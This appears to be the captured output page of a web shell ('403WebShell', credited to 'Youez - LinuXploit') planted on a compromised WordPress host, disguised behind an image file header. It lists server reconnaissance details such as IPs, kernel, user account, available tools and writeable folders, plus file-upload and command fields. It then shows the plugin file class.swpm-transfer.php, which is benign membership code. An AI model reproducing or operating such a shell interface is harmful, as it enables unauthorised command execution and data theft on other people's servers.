????JFIF??x?x????'403WebShell
403Webshell
Server IP : 104.21.16.1  /  Your IP : 216.73.216.145
Web Server : LiteSpeed
System : Linux premium151.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
User : tempvsty ( 647)
PHP Version : 8.0.30
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/tempvsty/pontiacques.org/wp-content/plugins/simple-membership/classes/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/tempvsty/pontiacques.org/wp-content/plugins/simple-membership/classes/class.swpm-transfer.php
<?php

class SwpmTransfer {

    public static $default_fields = array(
        'first_name' => '',
        'last_name' => '',
        'user_name' => '',
        'email' => '',
        'password' => '',
        'phone' => '',
        'account_state' => '',
        'member_since' => '',
        'subscription_starts' => '',
        'address_street' => '',
        'address_city' => '',
        'address_state' => '',
        'address_zipcode' => '',
        'company_name' => '',
        'country' => '',
        'gender' => 'not specified',
        'membership_level' => '2',
        'notes' => ''
    );
    
    public static $default_level_fields = array(
        'alias' => '', 'role' => '',
        'subscription_period' => '', 'subscription_duration_type' => SwpmMembershipLevel::NO_EXPIRY);
    
    public $message;
    public static $admin_messages = array();
    private static $_this;

    private function __construct() {
        $this->message = get_option('swpm-messages');
    }

    public static function get_instance() {
        self::$_this = empty(self::$_this) ? new SwpmTransfer() : self::$_this;
        return self::$_this;
    }

    public function get($key) {
        $messages = new SwpmMessages();
        return $messages->get($key);
    }

    public function set($key, $value) {
        $messages = new SwpmMessages();
        $messages->set($key, $value);
    }
    
    /*** Deprecated function - exists only for backwards compatibility ***/
    public static function get_real_ip_addr() {
        return SwpmUtils::get_user_ip_address();
    }
}

Youez - 2016 - github.com/yon3zu
LinuXploit